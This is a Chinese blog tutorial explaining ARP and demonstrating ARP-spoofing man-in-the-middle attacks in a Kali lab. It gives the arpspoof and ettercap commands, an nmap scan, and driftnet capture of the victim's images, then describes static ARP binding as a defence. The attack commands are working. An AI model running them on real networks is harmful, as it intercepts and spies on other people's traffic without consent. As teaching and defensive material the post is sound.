引言
相信很多处于局域网的朋友对ARP攻击并不陌生,在我们常用的Windows操作系统下拥有众多ARP防火墙,可以很好的阻断ARP攻击,但是如果使用的是Linux系统要怎么做才能防止ARP攻击呢?想要防御就需要先了解攻击的原理。这篇文章使用Kali系统(基于Debian的众多发行版之一),实例演示Linux系统如何实施ARP攻击以及如何防范。
文章目录
0×1.ARP工作原理
0×2.使用arpspoof实现中间人arp攻击
0×3.使用ettercap实现中间人arp攻击
0×4.使用driftnet实现网卡图片捕获
0×5.Linux系统如何防范ARP攻击
0×1.ARP工作原理
简单的说ARP(Address Resolution Protocol 地址解析协议)是在局域网环境中根据IP地址获取MAC地址的一个TCP/IP协议。
希望了解更多ARP工作原理的朋友可以参考一下本站这篇文章:[[CCNA图文笔记]-3-TCP/IP参考模型和协议的对应关系],文章中"网际层(Internet)"那一节对交换机原理的描述,对理解ARP攻击非常有帮助。
攻击形成的原理浅析,假设有如下的IP与MAC:
局域网网关(A)IP:192.168.1.1
局域网MAC:11:11:11:11:11:11
被攻击者(B)IP:192.168.1.2
被攻击者MAC:22:22:22:22:22:22
攻击者(C)IP:192.168.1.3
被攻击者MAC:33:33:33:33:33:33
正常的时候,计算机B在自己的ARP缓存中记录了正确的网关IP和MAC映射关系(192.168.1.1>11:11:11:11:11:11),而这个时候C发动攻击,他伪造一个虚假的ARP数据包(192.168.1.1>44:44:44:44:44:44)这个数据包发送给B后,B的ARP缓存中关于网关的映射关系就被改成了错误的(192.168.1.1>44:44:44:44:44:44),这个全4的MAC在局域网中根本不存在。
在局域网中想要上网,数据必须先通过网关才能发送出去,但是B计算机的ARP缓存中对应网关的MAC地址被篡改,它现在无法和网关通信,所以就不能正常上网了。
除此之外,如果C伪造的虚假ARP不仅仅是欺骗B还欺骗网关A,C告诉网关,我就是B,然后再告诉B,我就是网关A,那么C作为"中间人"在A和B之间搭建起了一座桥梁,所有B的上网流量都要经过C的网卡发给网关,而网关将返回的数据发给C,再由C发给B,与上面的ARP攻击不同,此时的B是能正常上网的,但它的所有操作都可能被C记录,除非所有的数据在源头被加密发送,而这种加密必须不可逆。
0×2.使用arpspoof实现中间人arp攻击
这篇文章的第2~3小节的内容是在Kali系统中完成的,附上[Kali官方网站]连接,大家可以下载后安装在虚拟机中测试。
实验环境:
攻击者A:系统(Kali),IP (192.168.1.249/24),MAC(00:0c:29:00:4b:47)
靶机B:系统(Ubuntu),IP(192.168.1.201/24),MAC(00:0c:29:fd:ce:ce)
网关C:IP(192.168.1.1),MAC(a6:aa:15:8a:17:22)
在Kali中打开终端,实施中间人攻击:
-
01 #在没有开始攻击前,B可以正常上网,其arp缓存如下 -
02 B@qingsword.com:~$ ping 192.168.1.1 -
03 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. -
04 64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.71 ms -
05 -
06 #正常的网关arp缓存,和网关C的MAC保持一致 -
07 B@qingsword.com:~$ arp -a -
08 localhost (192.168.1.1) 位于 a6:aa:15:8a:17:22 [ether] 在 ens36 -
09 -
10 #1.在A中开启IPv4转发 -
11 A@qingsword.com:~$ echo 1 >> /proc/sys/net/ipv4/ip_forward -
12 -
13 #2.首先对B说,我是网关C,-i参数后面是本地发送数据的接口号,请使用ifconfig查看,不同版本的系统接口号并不相同 -
14 A@qingsword.com:~$ arpspoof -i eth0 -t 192.168.1.201 192.168.1.1 -
15 -
16 #3.然后再打开一个终端,对网关C说,我是B -
17 A@qingsword.com:~$ arpspoof -i eth0 -t 192.168.1.1 192.168.1.201 -
18 -
19 #上面的第2~3步,可以用一条指令代替,-t后面是靶机IP,-r后面是网关IP,效果同上,完成双向欺骗 -
20 A@qingsword.com:~$ arpspoof -i eth0 -t 192.168.1.201 -r 192.168.1.1 -
21 -
22 #此时的B上面会多出两条arp缓存,其中网关的MAC变成了A的MAC地址,这个时候B是可以正常上网的,但是全部的流量都会经过A中转 -
23 B@qingsword.com:~$ arp -a -
24 localhost (192.168.1.249) 位于 00:0c:29:00:4b:47 [ether] 在 ens36 -
25 localhost (192.168.1.1) 位于 00:0c:29:00:4b:47 [ether] 在 ens36
使用ctrl+c停止对B的攻击,下面使用ettercap来实现相同的效果。
0×3.使用ettercap实现中间人arp攻击
Kali中的ettercap功能十分强大,本节仅介绍其arp攻击模块,试验环境同第2小节,首先介绍ettercap的图形模式,在终端中输入下面的命令,打开ettercap图形界面:
-
1 A@qingsword.com:~$ ettercap -G
使用中间人模式进行欺骗:
选择本地发送数据的网卡接口:
首先进行局域网扫描,扫描结束后,打开主机列表(如果出现漏扫的情况,多扫描几次):
将靶机IP添加到target1,将网关IP添加到target2:
在Mitm菜单中,选择arp欺骗(如果要停止所有Mitm攻击,也是在这个菜单中,选择最下面的"Stop mitm attack"):
勾选remote模式,实现双向欺骗:
完成这一系列操作后,在B上面查看arp缓存,应该得到和第2小节相同的输出,B能正常上网,但上网的所有流量都经过了A的网卡。
下面是ettercap使用命令行模式完成上面的操作,关掉ettercap的图形界面,使用命令行模式:
| 01 | #首先可以使用nmap扫描整个网段都有哪些存活机器,相当于图3的扫描 |
| 02 | A@qingsword.com:~$ nmap -sS 192.168.1.0/24 |
| 03 |
| 04 | #使用命令行模式运行ettercap |
| 05 | A@qingsword.com:~$ ettercap -Tqi eth0 -M arp:remote /192.168.1.201// /192.168.1.1// |
| 06 |
| 07 | /* |
| 08 | * 参数详解: |
| 09 | * -T 文本模式运行,即命令行模式 |
| 10 | * -q 安静模式,不输出嗅探信息 |
| 11 | * -i 后面接本地发送数据的接口号,相当图2中选择接口 |
| 12 | * -M mitm攻击,相当于图5 Mitm菜单 |
| 13 | * arp:remote 实现arp双向欺骗,相当于图6勾选remote |
| 14 | * 后面的IP地址,相当于图4的target1和target2 |
| 15 | * target的完整格式是"MAC/IPs/IPv6/PORTs", |
| 16 | * 即:"硬件地址/IP列表/IPv6地址/端口列表"" |
| 17 | * 所以才会出现"/192.168.1.1//"这种奇怪的格式, |
| 18 | * 这个格式表明MAC以及IPv6地址和最后的端口号为空,仅使用IP地址作为目标 |
| 19 | */ |
| 20 |
| 21 | #输入q回车,可以结束嗅探 |
效果与使用图形化界面相同,请根据不同环境选择不同方式。
0×4.使用driftnet实现网卡图片捕获
使用上面三种方法中的任意一种,完成arp中间人嗅探后,靶机的流量会经过A的网卡转发,现在有一个组件driftnet,可以捕获本地网卡流量中的图片显示出来:
| 1 | #方法1,仅显示,会打开一个窗口,将经过本地网卡eth0的所有图片信息提取出来显示 |
| 2 | A@qingsword.com:~$ driftnet -i eth0 |
| 3 |
| 4 | #方法2,不显示,但将捕获到的图片全部保存到/root/cap目录 |
| 5 | A@qingsword.com:~$ driftnet -i eth0 -a -d /root/cap |
| 6 |
| 7 | #不同版本系统的网卡名称可能不同,请根据自己系统的输出更改 |
完成后,尝试着在B上面打开一些带图片的页面,看看A上面是不是捕获到了这些图片信息?
0×5.Linux系统如何防范ARP攻击
在Linux中最好的方法就是实现网关IP与网关MAC的静态绑定,只需要一条命令即可完成:
| 01 | #首先,获取正确的网关MAC地址后,在B上面,使用网关IP到MAC的静态绑定 |
| 02 | B@qingsword.com:~$ sudo arp -s 192.168.1.1 a6:aa:15:8a:17:22 |
| 03 |
| 04 | #再次查看arp缓存,就会发现网关的arp后面多出一个PERM参数,这说明静态绑成功了,现在再次使用上面任何方法进行arp欺骗,由于静态绑定优先级最高,B不会将数据发送给A,而是直接发送给网关 |
| 05 | localhost (192.168.1.1) 位于 a6:aa:15:8a:17:22 [ether] PERM 在 ens36 |
| 06 |
| 07 | #实际上完成上面的单向绑定后,A对B的arp欺骗就已经不起作用了,如果我们有路由器的权限,在路由器中绑定B的IP和MAC,实现双向绑定之后,arp欺骗对B就彻底不起作用了 |
| 08 |
| 09 | #删除静态绑定的方法,使用参数-d |
| 10 | B@qingsword.com:~$ arp -d 192.168.1.1 a6:aa:15:8a:17:22 |
文章出处:晴刃(QingSword.COM)
扫一扫关注我们(千份奖品活动临近,还不赶紧关注)
实验室加入申请,商业合作,进讨论群联系小Tone
1771
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
